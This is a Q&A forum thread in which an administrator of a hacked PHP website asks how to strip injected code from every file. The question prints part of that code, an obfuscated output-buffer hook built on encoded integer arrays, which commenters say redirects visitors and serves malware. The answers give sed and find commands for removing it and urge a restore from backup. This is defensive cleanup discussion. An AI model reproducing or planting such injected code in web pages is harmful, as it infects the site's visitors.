1

Possible Duplicate:
My server's been hacked EMERGENCY

Hello,

I need your help urgently as the server has been hacked and I do not have any time to learn of how to remove the hacker's code from all files. I have attached the code which was added to all files. There are many special characters in this code and it's quite large. It was added in the files sometimes twice.

I do not know sed well to solve this issue with it. How to exclude this piece of code from all files? Using sed, diff/patch or other techniques?

Here is part of the code to be removed:

    <?php global $ob_starting;
if(!$ob_starting) {
   function ob_start_flush($s) {
        $tc = array(0, 69, 83, 84, 82, 67, 7, 79, 9, 8, 23, 73, 12, 76, 68, 78, 63, 24, 14, 19, 3, 65, 27, 17, 85, 70, 80, 16, 29, 11, 89, 86, 2, 66, 77, 93, 91, 71, 18, 72, 20, 75, 87, 22, 74, 13, 59, 61, 52, 37, 28, 35, 15, 1, 21, 25, 34, 92, 36, 41, 30, 88, 46, 33, 51);
        $tr = array(50, 2, 5, 4, 11, 26, 3, 0, 3, 30, 26, 1, 28, 32, 3, 1, 61, 3, 52, 44, 21, 31, 21, 2, 5, 4, 11, 26, 3, 32, 60, 11, 25, 0, 9, 3, 30, 26, 1, 7, 25, 9, 4, 1, 14, 1, 25, 16, 5, 7, 13, 7, 4, 2, 8, 28, 28, 32, 24, 15, 14, 1, 25, 11, 15, 1, 14, 32, 8, 0, 36, 0, 0, 0, 31, 21, 4, 0, 14, 11, 31, 16, 5, 7, 13, 7, 4, 2, 0, 28, 0, 15, 1, 42, 0, 63, 4, 
-------------

-------------
       $i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);

        return $s;
   }
   $ob_starting = time();
   @ob_start("ob_start_flush");

I will appreciate any help. Thanks.

Update:

I have tried using the code like:

for fname $(grep *.php .); do
        while read; do
                sed -i 's/$REPLY//' $fname
        done < filem
done

where filem - is a file with the malicious code. In this file I replaced all special characters like $<( etc with the dot '.', but still sed brings many errors.

Community
  • 1
Andrew
  • 1,044
  • 6
  • 21
  • 36
  • 11
    Nuke it from orbit and restore from backup. For bonus points take an image and investigate after you're finished with the first step. – Chris S May 05 '11 at 03:11
  • It's not the duplicate, Chris, please! I cannot restore from backups, it's not the case.. – Andrew May 05 '11 at 03:32
  • 6
    If you can't restore from backups, that means you haven't taken any backups. In which case, you kinda deserve what you get. You don't patch compromised systems. You rebuild from backups, and close the original security hole. Anything else is asking for more pwnage. – Holocryptic May 05 '11 at 03:39
  • @Holocryptic I do perform backups on weekly basis as to my company terms. But in this case I need the latest version of the site. Why don't you write a few lines of code to help me? I would be very grateful for any advice regarding the code. – Andrew May 05 '11 at 03:53
  • 2
    @user78650 The reason that they're suggesting to go back to a non-hacked state is that you have no way of knowing that those chunks of code are truly the only modification that the attacker made to the server. – Shane Madden May 05 '11 at 03:56
  • 3
    @user, we don't write you a few lines of code because we are helping you. I know that might be hard to accept, but it is what it is. – Chris S May 05 '11 at 04:03
  • 3
    A quick google shows that whatever else this code is doing, one thing's for sure - it's re-directing your visitors and installing virii and all sorts of bad things onto their machines. Take your site offline *now*, or else everyone who passes through will be infected. – Mark Henderson May 05 '11 at 04:13
  • @Chris S I understand. It's hard to be a novice sometimes. – Andrew May 05 '11 at 14:23
  • @Mark Henderson Yes, the code is uploading malware to the users machines, here is the topic where its code is discussing: [link](http://stackoverflow.com/questions/5456462/what-does-this-php-code-do) – Andrew May 05 '11 at 14:27

2 Answers2

5

The advice in the comments is completely correct. You really do need to restore from backup, but if the hacker's code looks EXACTLY like your example above you can try this (make a backup copy of your webroot first.)

sed -i '/<?php global $ob_starting;/,/@ob_start("ob_start_flush");/d' cleanme.php

To walk the webroot and all subdirectories you can use find:

find $WEBROOT -type f -exec sed -i '/<?php global $ob_starting;/,/@ob_start("ob_start_flush");/d' {} \;

The sed removes everything between the start and end variables given. Good luck.

mfarver
  • 2,576
  • 13
  • 16
  • Thank you very much. You advice was very helpful. Thank you once more. I will start learning sed as soon as possible. – Andrew May 05 '11 at 04:39
  • 1
    @user78650, while learning `sed` would certainly be useful I suggest you first concentrate on getting your backups working. – John Gardeniers May 05 '11 at 05:51
0

are you using osCommerce? Perhaps you should look in their support forums, seems to be others dealing with nearly the same thing - and removing the code without understanding the problem will most likely result in it happening again

http://forums.oscommerce.com/topic/373376-hacked-by-code-global-ob-starting/

http://forums.oscommerce.com/topic/373373-site-hacked-should-you-upgrade-or-try-to-fix-it-as-it-is/

DNAspark99
  • 11
  • 3
  • Thank you for the links, I will check them. It's not osCommerce, it's 'Website Baker project' something like that. Anyway, I am obliged to remove the code to bring the sites back and then to investigate the intrusion only. I do need to remove the code. – Andrew May 05 '11 at 03:32
  • 2
    You may want to make sure that you never reveal who you work for, then. They can face massive liability from customers, etc for knowingly putting back into production a compromised server. – Hyppy May 05 '11 at 04:38
  • huge +1 for Hyppy here. Seriously @user - do not just fix that code and bring the site back up. Any attacker worth their salt will have done much more than that which you can see, and as @Hyppy says - you KNOW it is compromised. Serious liability issues! – Rory Alsop May 05 '11 at 07:59
  • @Rory Alsop I seem not to have any choice. Thank you for advice. – Andrew May 05 '11 at 14:28
  • Actually a lot of compromises today are just automated defacements or insertion of malicious code. The attacker has no interest in compromising the server, just the website. Since the attacks are done by scripts they are easy to clean up after. You still have to close the hole that let the attacker in, but the machine is seldom rooted. Having said that, it is still good advice to assume that if attacker got in he probably got root. Too many local exploits floating around... – mfarver May 05 '11 at 16:23